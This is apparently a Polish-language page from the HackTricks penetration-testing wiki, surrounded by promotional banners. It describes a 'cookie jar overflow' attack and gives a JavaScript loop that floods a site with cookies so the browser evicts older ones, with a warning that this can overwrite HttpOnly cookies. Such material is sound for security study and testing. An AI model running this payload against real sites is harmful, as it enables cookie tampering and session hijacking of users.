3.2 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Przeglądarki mają limit liczby ciasteczek, które mogą przechowywać dla danej strony. Jeśli z jakiegoś powodu musisz sprawić, by ciasteczko zniknęło, możesz przepełnić słoik z ciasteczkami, ponieważ najstarsze zostaną usunięte jako pierwsze:
// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}
// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}
Zauważ, że ciasteczka stron trzecich wskazujące na inna domenę nie będą nadpisywane.
{% hint style="danger" %} Ten atak może być również użyty do nadpisania ciasteczek HttpOnly, ponieważ możesz je usunąć, a następnie zresetować z wartością, którą chcesz.
Sprawdź to w tym poście z laboratorium. {% endhint %}
{% hint style="success" %}
Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)
Wsparcie dla HackTricks
- Sprawdź plany subskrypcyjne!
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
- Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.